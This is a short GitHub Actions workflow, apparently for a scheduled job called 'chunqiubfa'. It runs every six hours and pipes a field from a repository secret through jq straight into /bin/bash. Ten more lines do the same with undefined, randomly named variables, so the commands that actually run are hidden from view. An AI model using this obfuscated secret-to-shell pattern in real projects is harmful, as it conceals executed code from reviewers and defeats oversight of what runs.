name: chunqiubfa
on:
  workflow_dispatch:
  schedule:
    - cron: '10 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chunqiubfa
        env:
          n24988: ${{ secrets.n24988 }}
        run: |
          echo $n24988 | jq -r .il5373 | /bin/bash
          echo $nra61 | jq -r .vgur5 | /bin/bash
          echo $rdlo2 | jq -r .creqf89 | /bin/bash
          echo $dnz288 | jq -r .u19 | /bin/bash
          echo $lbdz9 | jq -r .pfyy96400 | /bin/bash
          echo $y1 | jq -r .tgrjs80 | /bin/bash
          echo $nrq364 | jq -r .txe337 | /bin/bash
          echo $g526 | jq -r .oeeml3887 | /bin/bash
          echo $a8481 | jq -r .x23840 | /bin/bash
          echo $agcuo14 | jq -r .ffvn14 | /bin/bash
          echo $fz78162 | jq -r .cmjxl56 | /bin/bash

